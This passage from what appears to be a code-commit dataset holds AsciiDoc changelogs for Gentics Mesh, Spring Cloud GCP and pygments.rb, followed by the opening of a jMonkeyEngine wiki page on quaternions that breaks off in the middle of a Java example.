had been invoked. Instead the basic auth login information will only be send directly during login.\n\nicon:check[] A bug within the breadcrumb resolver has been fixed. Previously breadcrumbs did not account for language fallback options and thus returned a 404 path for nodes which used a different language compared to the language of the retrieved node. This has been fixed.\n\n== 0.6.23 (14.09.2016)\n\nicon:check[] The missing availableLanguages and defaultLanguage parameters have been added to the mesh-ui-config.js file. Previously no language was configured which removed the option to translate contents.\n\n== 0.6.22 (24.08.2016)\n\nicon:plus[] It is now possible to publish language variants. Previously it was only possible to publish nodes. This affected all language variants of the node.\n\n== 0.6.21 (17.08.2016)\n\nicon:plus[] The debug output in case of errors has been enhanced.\n\n== 0.6.20 (03.08.2016)\n\nicon:check[] The changelog processing action for existing installations was fixed.\n\n== 0.6.19 (02.08.2016)\n\nicon:check[] Mesh-Admin-UI was updated to version 0.6.13\n\n== 0.6.18 (24.06.2016)\n\nicon:check[] Previously a search request which queried a lot of nodes could result in a StackOverflow exception. The cause for this exception was fixed.\n\nicon:plus[] The gentics\/mesh and gentics\/mesh-demo images now use the alpine flavour base image and thus the size of the image stack has been reduced.\n\nicon:plus[] The performance of the search endpoints have been improved.\n\n== 0.6.17 (22.06.2016)\n\nicon:check[] The path property within the node response breadcrumb was not set. The property will contain the resolved webroot path for the breadcrumb element. No value will be set if the resolveLinks query parameter was configured or set to OFF. CL-459\n\n== 0.6.16 (21.06.2016)\n\nicon:plus[] Gzip compression support was added. JSON responses are now pretty printed by default.\n\n== 0.6.15 (20.06.2016)\n\nicon:plus[] Mesh-Admin-UI was updated to version 0.6.12\n\n== 0.6.13 (17.06.2016)\n\nicon:plus[] Mesh-Admin-UI was updated to version 0.6.10\n\n== 0.6.12 (02.06.2016)\n\nicon:check[] A bug within the schema migration process was fixed. The label field was previously not correctly handled for newly added fields.\n\nicon:check[] A bug within the schema migration process was fixed. The segmentfield value was reset to null when updating a schema. This has been fixed now.\n\nicon:check[] The \"AllChangeProperties\" field was removed from the JSON response of schema fields.\n\n== 0.6.11 (31.05.2016)\n\nicon:check[] A bug which prevented node reference deletion was fixed. It is now possible to delete node references using a json null value in update requests.\n\nicon:plus[] OrientDB was updated to version 2.1.18\n\n== 0.6.10 (25.05.2016)\n\nicon:check[] It is now possible to grant and revoke permissions to microschemas using the roles\/:uuid\/permissions endpoint.\n\n== 0.6.9 (04.05.2016)\n\nicon:plus[] The mesh-ui was updated.\n\nicon:plus[] It is now possible to also include non-container nodes in a navigation response using the includeAll parameter. By default only container nodes will be included in the response.\n\nicon:check[] A minor issue within the webroot path handling of node references was fixed. CL-425\n\nicon:check[] Fixed label and allow field property handling when updating schema fields. CL-357\n\nicon:check[] Various concurrency issues have been addressed.\n\n== 0.6.8 (26.04.2016)\n\nicon:plus[] The mesh-ui was updated.\n\nicon:plus[] OrientDB was updated to version 2.1.16\n\n== 0.6.7 (25.04.2016)\n\nicon:check[] Update checker. A bug that prevented the update checker from working correctly was fixed.\n\n== 0.6.6 (06.04.2016)\n\nicon:bullhorn[] Public open beta release\n\nicon:check[] A bug within the reindex changelog entry was fixed. The bug prevented the node index to be recreated.\n\nicon:check[] The mesh-ui-config.js default apiUrl parameter was changed to {apiLatest} in order to allow access from hosts other than localhost.\n\n== 0.6.5 (05.04.2016)\n\nicon:check[] The displayField value was missing within the node search document. The value was added.\n\nicon:check[] The changelog execution information was added to the demo data dump and thus no further changelog execution will happen during mesh demo startup.\n\nicon:check[] An edge case that could cause multiple stack overflow exception was fixed.\n\nicon:plus[] A Cache-Control: no-cache header has been set to mesh responses.\n\nicon:plus[] The mesh-ui was updated.\n\nicon:check[] Various search index related bugs have been fixed.\n\nicon:plus[] The mesh-ui configuration file was renamed to mesh-ui.config.js\n\n== 0.6.4 (24.03.2016)\n\nicon:plus[] The mesh ui was updated.\n\n== 0.6.3 (22.03.2016)\n\nicon:plus[] Database migration\/changelog system.\n A changelog system was added to mesh. The system is used to upgrade mesh data from one mesh version to another.\n\nicon:plus[] The *published* flag can now be referenced within an elasticsearch query.\n\nicon:check[] It was not possible to update the *allow* flag for schema lists (e.g. micronode lists). This has been fixed now.\n\nicon:check[] The schema migration process did not update the node search index correctly.\n In some cases duplicate nodes would be returned (the old node and the migrated one).\n This has been fixed. Only the latest version of nodes will be returned now.\n\nicon:check[] A NPE was fixed which occurred when updating or creating a node list which included elements which could not be found. (CL-358)\n\nicon:check[] A typo within the search model document for users was fixed.\n The property `emailadress` was renamed to `emailaddress`.\n\n== 0.6.2 (15.03.2016)\n\nicon:check[] The microschema and schema permission field was always empty for newly created elements.\n\n== 0.6.1 (14.03.2016)\n\nicon:plus[] Added mesh-ui to gentics\/mesh docker image\n\n== 0.6.0 (14.03.2016)\n\nicon:plus[] Added image API endpoint\n Images can now be resized and cropped using the image endpoint.\n\nicon:plus[] Added schema versioning\n\nicon:plus[] Added schema migration process\n It is now possible to update schemas. Custom migration\n handlers can be defined in order to modify the node data.\n\nicon:plus[] Added Micronodes\/Microschemas\n A new field type has been added which allows creation of micronodes.\n\nicon:plus[] Webroot API\n The webroot REST endpoint was added which allows easy retrieval of nodes by its web path.\n\nicon:plus[] JWT Authentication support has been added\n It is now possible to select JWT in order to authenticate the user.\n\nicon:plus[] Navigation Endpoint\n The navigation REST endpoint was added which allows retrieval of navigation tree data which can be used to render navigations.\n\nicon:plus[] Added docker support\n It is now possible to start mesh using the gentics\/mesh or gentics\/mesh-demo docker image.\n\nicon:plus[] Vert.x update\n The Vert.x dependency was updated to version 3.2.1\n\nicon:check[] Fixed paging issue for nested tags\n\n== 0.5.0 (17.11.2015)\n\nicon:important[] Closed beta release\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7882bd0f38ce58db0b00844b30ddf549c7be6388","subject":"Update changelog for 1.2.2.RELEASE (#2233)","message":"Update changelog for 1.2.2.RELEASE (#2233)\n\n* Update changelog for 1.2.2.RELEASE\r\n\r\n* Add links to issues","repos":"spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"= Spring Cloud GCP Changelog\n\nhttps:\/\/spring.io\/projects\/spring-cloud-gcp[Spring Cloud GCP] is a set of integrations between Spring Framework and Google Cloud Platform. It makes it much easier for Spring framework users to run their applications on Google Cloud Platform.\n\nThis document provides a high-level overview of the changes introduced in Spring Cloud GCP by release.\nFor a detailed view of what has changed, refer to the https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/commits\/master[commit history] on GitHub.\n\n== 1.2.2.RELEASE (2020-03-04)\n\n=== General\n\n* Switched to using GCP Libraries BOM for managing GCP library versions (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2109[#2109])\n* Core auto-configuration can now be disabled with `spring.cloud.gcp.core.enabled=false` (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2147[#2147])\n* Reference documentation improvements\n* Two new modules: Firebase Auth and Secret Manager\n\n=== Datastore\n\n* Support lazy loading entities using @LazyReference (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2104[#2104])\n* Made existsById more efficient by retrieving only the key field (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2127[#2127])\n* Projections now work with the Slice return type (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2133[#2133]) and GQL queries (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2139[#2139]) in repositories\n* Improved repository method name validation (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2155[#2155])\n* Fixed delete for void repository method return type (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2169[#2169])\n\n=== Firebase (NEW)\n\n* Introduced Firebase Authentication module (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2111[#2111])\n\n=== Firestore\n\n* Added IN support in name-based queries (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2054[#2054])\n\n=== Pub\/Sub\n\n* ACK_MODE is now configurable using stream binders (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2079[#2079])\n* Added HealthIndicator implementation (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2030[#2030])\n* Fixed: `PubSubReactiveFactory.poll` doesn't handle exceptions thrown by the `PubSubSubscriberOperations` (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2229[#2229])\n** NOTE: previously silently ignored exceptions are now forwarded to the Flux\n\n=== Secret Manager (NEW)\n\n* Bootstrap Property Source which loads secrets from Secret Manager to be accessible as environment properties to your application (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2168[#2168])\n* SecretManagerTemplate implementation (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2195[#2195])\n* New Secret Manager sample app (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2190[#2190])\n\n=== Spanner\n\n* Fixed java.util.Date conversion and added LocalDate and LocalDateTime support (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2067[#2067])\n* Added support for non-Key ID types in Spring Data REST repositories (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2049[#2049])\n* Optimized eager loading for interleaved properties (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2110[#2110]) (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2165[#2165])\n* Enable using PENDING_COMMIT_TIMESTAMP in Spring Data Spanner (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2203[#2203])\n\n=== Storage\n\n* Added ability to provide initial file contents on blob creation (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2097[#2097])\n* You can now use a comparator with GcsStreamingMessageSource to process blobs from Cloud Storage in an ordered manner. (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2117[#2117])\n* Fixed GCS emulator BlobInfo update time initialization (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2113[#2113])\n\n=== Trace\n\n* Hid trace scheduler from Spring Sleuth (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2158[#2158])\n\n== 1.2.1.RELEASE (2019-12-20)\n\n=== Spanner\n\n* Fixed java.sql.Timestamp to com.google.cloud.Timestamp conversion (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2064[#2064])\n\n=== Pub\/Sub\n\n* Fixed AUTO_ACK acking behavior in PubSubInboundChannelAdapter (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2075[#2075])\n\n== 1.2.0.RELEASE (2019-11-26)\n\n=== BigQuery\n\n* New module\n* Autoconfiguration for the BigQuery client objects with credentials needed to interface with BigQuery\n* A Spring Integration message handler for loading data into BigQuery tables in your Spring integration pipelines\n\n=== Cloud Foundry\n\n* Created a separate starter for Cloud Foundry: spring-cloud-gcp-starter-cloudfoundry\n\n=== Datastore\n\n* Datastore emulator support and auto-configuration\n* Entity Inheritance Hierarchies support\n* Query by example\n* Support Pagination for @Query annotated methods\n* Support key fields in name-based query methods\n* Events and Auditing support\n* Support for multiple namespaces\n* Spring Boot Actuator Support for Datastore Health Indicator (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1423[#1423])\n\n=== Firestore\n\n* Spring Data Reactive Repositories for Cloud Firestore\n* Cloud Firestore Spring Boot Starter\n\n=== Logging\n\n* Additional metadata support for JSON logging (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1310[#1310])\n* Add service context for Stackdriver Error Reporting\n* Add option to add custom json to log messages\n* A separate module for Logging outside of autoconfiguration (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1455[#1455])\n\n=== Pub\/Sub\n\n* PubsubTemplate publish to topics in other projects (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1678[#1678])\n* PubsubTemplate subscribe in other projects (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1880[#1880])\n* Reactive support for Pub\/Sub subscription (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1461[#1461])\n* Spring Integration - Pollable Message Source (using Pub\/Sub Synchronous Pull) (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1321[#1321])\n* Pubsub stream binder via synchronous pull (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1419[#1419])\n* Add keepalive property to pubsub; set default at 5 minutes (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1807[#1807])\n* Change thread pools to create daemon threads that do not prevent JVM shutdown (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2010[#2010])\n** This is a change in behavior for non-web applications that subscribe to a Cloud Pub\/Sub topic.\nThe subscription threads used to keep the application alive, but will now allow the application to shut down if no other work needs to be done.\n* Added original message to the throwable for Pub\/Sub publish failures (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2020[#2020])\n\n=== IAP\n\n* Added support to allow multiple IAP audience claims (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1856[#1856])\n\n=== Spanner\n\n* Expose Spanner failIfPoolExhausted property (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1889[#1889])\n* Lazy fetch support for interleaved collections (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1460[#1460])\n* Bounded staleness option support (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1727[#1727])\n* Spring Data Spanner Repositories `In` clause queries support (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1701[#1701])\n* Spanner array param binding\n* Events and Auditing support\n* Multi-Instance support (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1530[#1530])\n* Fixed conversion for timestamps older than unix epoch (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2043[#2043])\n* Fixed REST Repositories PUT by populating key fields when virtual key property is set (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2053[#2053])\n\n=== Spring Cloud Bus\n\n* Spring Cloud Config and Bus over Pub\/Sub sample\/docs (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1550[#1550])\n\n=== Vision\n\n* Cloud Vision Document OCR support\n\n== 1.1.0.RELEASE (2019-01-22)\n\n* https:\/\/cloud.google.com\/blog\/products\/application-development\/announcing-spring-cloud-gcp-1-1-deepening-ties-pivotals-spring-framework[1.1 announcement]\n\n== 1.0.0.RELEASE (2018-09-18)\n\n* https:\/\/cloud.google.com\/blog\/products\/gcp\/calling-java-developers-spring-cloud-gcp-1-0-is-now-generally-available[1.0 announcement]\n","old_contents":"= Spring Cloud GCP Changelog\n\nhttps:\/\/spring.io\/projects\/spring-cloud-gcp[Spring Cloud GCP] is a set of integrations between Spring Framework and Google Cloud Platform. It makes it much easier for Spring framework users to run their applications on Google Cloud Platform.\n\nThis document provides a high-level overview of the changes introduced in Spring Cloud GCP by release.\nFor a detailed view of what has changed, refer to the https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/commits\/master[commit history] on GitHub.\n\n== 1.2.0.RELEASE (2019-11-26)\n\n=== BigQuery\n\n* New module\n* Autoconfiguration for the BigQuery client objects with credentials needed to interface with BigQuery\n* A Spring Integration message handler for loading data into BigQuery tables in your Spring integration pipelines\n\n=== Cloud Foundry\n\n* Created a separate starter for Cloud Foundry: spring-cloud-gcp-starter-cloudfoundry\n\n=== Datastore\n\n* Datastore emulator support and auto-configuration\n* Entity Inheritance Hierarchies support\n* Query by example\n* Support Pagination for @Query annotated methods\n* Support key fields in name-based query methods\n* Events and Auditing support\n* Support for multiple namespaces\n* Spring Boot Actuator Support for Datastore Health Indicator (#1423)\n\n=== Firestore\n\n* Spring Data Reactive Repositories for Cloud Firestore\n* Cloud Firestore Spring Boot Starter\n\n=== Logging\n\n* Additional metadata support for JSON logging (#1310)\n* Add service context for Stackdriver Error Reporting\n* Add option to add custom json to log messages\n* A separate module for Logging outside of autoconfiguration (#1455)\n\n=== Pub\/Sub\n\n* PubsubTemplate publish to topics in other projects (#1678)\n* PubsubTemplate subscribe in other projects (#1880)\n* Reactive support for Pub\/Sub subscription (#1461)\n* Spring Integration - Pollable Message Source (using Pub\/Sub Synchronous Pull) (#1321)\n* Pubsub stream binder via synchronous pull (#1419)\n* Add keepalive property to pubsub; set default at 5 minutes (#1807)\n* Change thread pools to create daemon threads that do not prevent JVM shutdown (#2010)\n** This is a change in behavior for non-web applications that subscribe to a Cloud Pub\/Sub topic.\nThe subscription threads used to keep the application alive, but will now allow the application to shut down if no other work needs to be done.\n* Added original message to the throwable for Pub\/Sub publish failures (#2020)\n\n=== IAP\n\n* Added support to allow multiple IAP audience claims (#1856)\n\n=== Spanner\n\n* Expose Spanner failIfPoolExhausted property (#1889)\n* Lazy fetch support for interleaved collections (#1460)\n* Bounded staleness option support (#1727)\n* Spring Data Spanner Repositories `In` clause queries support (#1701)\n* Spanner array param binding\n* Events and Auditing support\n* Multi-Instance support (#1530)\n* Fixed conversion for timestamps older than unix epoch (#2043)\n* Fixed REST Repositories PUT by populating key fields when virtual key property is set (#2053)\n\n=== Spring Cloud Bus\n\n* Spring Cloud Config and Bus over Pub\/Sub sample\/docs (#1550)\n\n=== Vision\n\n* Cloud Vision Document OCR support\n\n== 1.1.0.RELEASE (2019-01-22)\n\n* https:\/\/cloud.google.com\/blog\/products\/application-development\/announcing-spring-cloud-gcp-1-1-deepening-ties-pivotals-spring-framework[1.1 announcement]\n\n== 1.0.0.RELEASE (2018-09-18)\n\n* https:\/\/cloud.google.com\/blog\/products\/gcp\/calling-java-developers-spring-cloud-gcp-1-0-is-now-generally-available[1.0 announcement]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3964c865a36e57707735ec31de252a2a9c809ea2","subject":"update changelog","message":"update changelog\n","repos":"tmm1\/pygments.rb,tmm1\/pygments.rb,tmm1\/pygments.rb","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"= {project-name} Changelog\n:project-name: pygments.rb\n:uri-repo: https:\/\/github.com\/pygments\/pygments.rb\n\nThis document provides a high-level view of the changes to the {project-name} by release.\nFor a detailed view of what has changed, refer to the {uri-repo}\/commits\/master[commit history] on GitHub.\n\n== Unreleased\n\n* Add support for custom lexers ({uri-repo}\/pull\/187[#187])\n* Update Pygments to 2.8.1\n\n== 2.1.0 (2021-02-14) - @slonopotamus\n\n* Update Pygments to 2.8.0\n\n== 2.0.0 (2021-01-08) - @slonopotamus\n\n* stop sending\/receiving `ids` between Ruby and Python\n* use `close_others` Ruby mechanism to prevent file descriptor leaking to Python\n\n== 2.0.0.rc3 (2021-01-08) - @slonopotamus\n\n* fix watchdog race condition leading to `ThreadError(<killed thread>)` on JRuby ({uri-repo}\/pull\/215[#215])\n\n== 2.0.0.rc2 (2021-01-07) - @slonopotamus\n\n* Fix release workflow\n\n== 2.0.0.rc1 (2021-01-07) - @slonopotamus\n\n* Modify `mentos.py` to run on Python 3.x instead of Python 2.7\n* Add `:timeout` parameter to allow for configurable timeouts\n* Add several Python 3.x versions to test matrix\n* Drop dependency on MultiJson\n* Fix hanging on JRuby + Windows\n* Update Pygments to 2.7.3\n* Drop GitHub custom lexers\n* Rework timeout handling\n* Improve error message when Python is not found\n* *Breaking change* Pygments.rb no longer sets default timeout for its operations\n* *Breaking change* Now pygments.rb raises `MentosError` instead of returning `nil` on timeout\n\n== 1.2.1 (2017-12-07)\n\n* Automatically update `lexers` cache on build ({uri-repo}\/pull\/186[#186])\n+\nSee {uri-repo}\/pull\/185[#185] for the reason\n\n== 1.2.0 (2017-09-13)\n\n* Exclude symlinks from the gem package to solve Windows issues ({uri-repo}\/pull\/181[#181])\n* Upgrade pygments to 2.0.0 ({uri-repo}\/pull\/180[#180])\n\n== 1.1.2 (2017-04-03)\n\n* Resolves {uri-repo}\/pull\/176[#176] exclude find_error.py symlink from gem ({uri-repo}\/pull\/177[#177])\n\n== 1.1.1 (2016-12-28)\n\n* Suppress Ruby 2.4.0's warnings ({uri-repo}\/pull\/172[#172])\n* Enable `frozen_string_literal` ({uri-repo}\/pull\/173[#173])\n\n== 1.1.0 (2016-12-24)\n\n* Support JRuby ({uri-repo}\/pull\/170[#170])\n* Make pygments.rb thread safe ({uri-repo}\/pull\/171[#171])\n\n== 1.0.0 (2016-12-11)\n\n* Upgrade bundled pygments to 2.2.0-HEAD ({uri-repo}\/pull\/167[#167])\n+\nThis includes *incompatible changes* because of upgrade of pygments.\nSee https:\/\/pygments.org\/ for details.\n* Relax yajl-ruby dependency to \"~> 1.2\" ({uri-repo}\/pull\/164[#164])\n* Python binary can be configured by `PYTMENTS_RB_PYTHON` env ({uri-repo}\/pull\/168[#168])\n* Improved error messages when python binary is missing ({uri-repo}\/pull\/158[#158])\n\n== 0.5.4 (2013-11-03)\n\n* Update lexers file\n\n== 0.5.3 (2013-09-17)\n\n* Fixes for Slash lexer\n* Improve highlighting for Slash lexer\n* Upgrade to latest pygments (1.7, changes summary follows.\nSee pygments changelog for details)\n** Add Clay lexer\n** Add Perl 6 lexer\n** Add Swig lexer\n** Add nesC lexer\n** Add BlitzBasic lexer\n** Add EBNF lexer\n** Add Igor Pro lexer\n** Add Rexx lexer\n** Add Agda lexer\n** Recognize vim modelines\n** Improve Python 3 lexer\n** Improve Opa lexer\n** Improve Julia lexer\n** Improve Lasso lexer\n** Improve Objective C\/C++ lexer\n** Improve Ruby lexer\n** Improve Stan lexer\n** Improve JavaScript lexer\n** Improve HTTP lexer\n** Improve Koka lexer\n** Improve Haxe lexer\n** Improve Prolog lexer\n** Improve F# lexer\n\n== 0.5.2 (2013-07-17)\n\n* Add Slash lexer\n\n== 0.5.1 (2013-06-25)\n\n* Ensure compatibility across distros by detecting if `python2` is available\n\n== 0.5.0 (2013-04-13)\n\n* Use `#rstrip` to fix table mode bug\n\n== 0.4.2 (2013-02-25)\n\n* Add new lexers, including custom lexers\n\n== 0.3.7 (2013-01-02)\n\n* Fixed missing custom lexers\n* Added syntax highlighting for Hxml\n\n== 0.3.4 (2012-12-28)\n\n* Add support for Windows\n* Add MIT license\n","old_contents":"= {project-name} Changelog\n:project-name: pygments.rb\n:uri-repo: https:\/\/github.com\/pygments\/pygments.rb\n\nThis document provides a high-level view of the changes to the {project-name} by release.\nFor a detailed view of what has changed, refer to the {uri-repo}\/commits\/master[commit history] on GitHub.\n\n== Unreleased\n\n* Add support for custom lexers ({uri-repo}\/pull\/187[#187])\n\n== 2.1.0 (2021-02-14) - @slonopotamus\n\n* Update Pygments to 2.8.0\n\n== 2.0.0 (2021-01-08) - @slonopotamus\n\n* stop sending\/receiving `ids` between Ruby and Python\n* use `close_others` Ruby mechanism to prevent file descriptor leaking to Python\n\n== 2.0.0.rc3 (2021-01-08) - @slonopotamus\n\n* fix watchdog race condition leading to `ThreadError(<killed thread>)` on JRuby ({uri-repo}\/pull\/215[#215])\n\n== 2.0.0.rc2 (2021-01-07) - @slonopotamus\n\n* Fix release workflow\n\n== 2.0.0.rc1 (2021-01-07) - @slonopotamus\n\n* Modify `mentos.py` to run on Python 3.x instead of Python 2.7\n* Add `:timeout` parameter to allow for configurable timeouts\n* Add several Python 3.x versions to test matrix\n* Drop dependency on MultiJson\n* Fix hanging on JRuby + Windows\n* Update Pygments to 2.7.3\n* Drop GitHub custom lexers\n* Rework timeout handling\n* Improve error message when Python is not found\n* *Breaking change* Pygments.rb no longer sets default timeout for its operations\n* *Breaking change* Now pygments.rb raises `MentosError` instead of returning `nil` on timeout\n\n== 1.2.1 (2017-12-07)\n\n* Automatically update `lexers` cache on build ({uri-repo}\/pull\/186[#186])\n+\nSee {uri-repo}\/pull\/185[#185] for the reason\n\n== 1.2.0 (2017-09-13)\n\n* Exclude symlinks from the gem package to solve Windows issues ({uri-repo}\/pull\/181[#181])\n* Upgrade pygments to 2.0.0 ({uri-repo}\/pull\/180[#180])\n\n== 1.1.2 (2017-04-03)\n\n* Resolves {uri-repo}\/pull\/176[#176] exclude find_error.py symlink from gem ({uri-repo}\/pull\/177[#177])\n\n== 1.1.1 (2016-12-28)\n\n* Suppress Ruby 2.4.0's warnings ({uri-repo}\/pull\/172[#172])\n* Enable `frozen_string_literal` ({uri-repo}\/pull\/173[#173])\n\n== 1.1.0 (2016-12-24)\n\n* Support JRuby ({uri-repo}\/pull\/170[#170])\n* Make pygments.rb thread safe ({uri-repo}\/pull\/171[#171])\n\n== 1.0.0 (2016-12-11)\n\n* Upgrade bundled pygments to 2.2.0-HEAD ({uri-repo}\/pull\/167[#167])\n+\nThis includes *incompatible changes* because of upgrade of pygments.\nSee https:\/\/pygments.org\/ for details.\n* Relax yajl-ruby dependency to \"~> 1.2\" ({uri-repo}\/pull\/164[#164])\n* Python binary can be configured by `PYTMENTS_RB_PYTHON` env ({uri-repo}\/pull\/168[#168])\n* Improved error messages when python binary is missing ({uri-repo}\/pull\/158[#158])\n\n== 0.5.4 (2013-11-03)\n\n* Update lexers file\n\n== 0.5.3 (2013-09-17)\n\n* Fixes for Slash lexer\n* Improve highlighting for Slash lexer\n* Upgrade to latest pygments (1.7, changes summary follows.\nSee pygments changelog for details)\n** Add Clay lexer\n** Add Perl 6 lexer\n** Add Swig lexer\n** Add nesC lexer\n** Add BlitzBasic lexer\n** Add EBNF lexer\n** Add Igor Pro lexer\n** Add Rexx lexer\n** Add Agda lexer\n** Recognize vim modelines\n** Improve Python 3 lexer\n** Improve Opa lexer\n** Improve Julia lexer\n** Improve Lasso lexer\n** Improve Objective C\/C++ lexer\n** Improve Ruby lexer\n** Improve Stan lexer\n** Improve JavaScript lexer\n** Improve HTTP lexer\n** Improve Koka lexer\n** Improve Haxe lexer\n** Improve Prolog lexer\n** Improve F# lexer\n\n== 0.5.2 (2013-07-17)\n\n* Add Slash lexer\n\n== 0.5.1 (2013-06-25)\n\n* Ensure compatibility across distros by detecting if `python2` is available\n\n== 0.5.0 (2013-04-13)\n\n* Use `#rstrip` to fix table mode bug\n\n== 0.4.2 (2013-02-25)\n\n* Add new lexers, including custom lexers\n\n== 0.3.7 (2013-01-02)\n\n* Fixed missing custom lexers\n* Added syntax highlighting for Hxml\n\n== 0.3.4 (2012-12-28)\n\n* Add support for Windows\n* Add MIT license\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"2e2b1a4d2b0e4646b41fc75304f4866c44033f60","subject":"Capitalized title.","message":"Capitalized title.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/quaternion.adoc","new_file":"src\/docs\/asciidoc\/jme3\/quaternion.adoc","new_contents":"= Quaternion\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/\n:imagesdir: ..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\n\n== Quaternion\n\nSee link:https:\/\/javadoc.jmonkeyengine.org\/index.html?com\/jme3\/math\/Quaternion.html[Javadoc]\n\n\n=== Definition\n\nQuaternions define a subset of a hypercomplex number system. Quaternions are defined by (i^2^ = j^2^ = k^2^ = ijk = -1). jME makes use of Quaternions because they allow for compact representations of rotations, or correspondingly, orientations, in 3D space. With only four float values, we can represent an object's orientation, where a rotation matrix would require nine. They also require fewer arithmetic operations for concatenation.\n\nAdditional benefits of the Quaternion is reducing the chance of link:http:\/\/en.wikipedia.org\/wiki\/Gimbal_lock[Gimbal Lock] and allowing for easily interpolation between two rotations (spherical linear interpolation or slerp).\n\nWhile Quaternions are quite difficult to fully understand, there are an exceeding number of convenience methods to allow you to use them without having to understand the math behind it. Basically, these methods involve nothing more than setting the Quaternion's x,y,z,w values using other means of representing rotations. The Quaternion is then contained in <<jme3\/advanced\/spatial#,Spatial>> as its local rotation component.\n\nQuaternion *q* has the form\n\n*q* = <_w,x,y,z_> = _w + xi + yj + zk_\n\nor alternatively, it can be written as:\n\n*q* = *s* + *v*, where *s* represents the scalar part corresponding to the w-component of *q*, and *v* represents the vector part of the (x, y, z) components of *q*.\n\nMultiplication of Quaternions uses the distributive law and adheres to the following rules with multiplying the imaginary components (i, j, k):\n\n`i^2^ = j^2^ = k^2^ = -1`+\n`ij = -ji = k`+\n`jk = -kj = i`+\n`ki = -ik = j`\n\nHowever, Quaternion multiplication is _not_ commutative, so we have to pay attention to order.\n\n*q~1~q~2~* = s~1~s~2~ - *v~1~* dot *v~2~* + s~1~*v~2~* + s~2~*v~1~* + *v~1~* X *v~2~*\n\nQuaternions also have conjugates where the conjugate of *q* is (s - *v*)\n\nThese basic operations allow us to convert various rotation representations to Quaternions.\n\n\n=== Angle Axis\n\nYou might wish to represent your rotations as Angle Axis pairs. That is, you define a axis of rotation and the angle with which to rotate about this axis. Quaternion defines a method `fromAngleAxis` (and `fromAngleNormalAxis`) to create a Quaternion from this pair. This is acutally used quite a bit in jME demos to continually rotate objects. You can also obtain a Angle Axis rotation from an existing Quaternion using `toAngleAxis`.\n\n\n==== Example - Rotate a Spatial Using fromAngleAxis\n\n[source,java]\n----\n\n\/\/rotate about the Y-Axis by approximately 1 pi\nVector3f axis = Vector3f.UNIT_Y; \/\/ this equals (0, 1, 0) and does not require to create a new 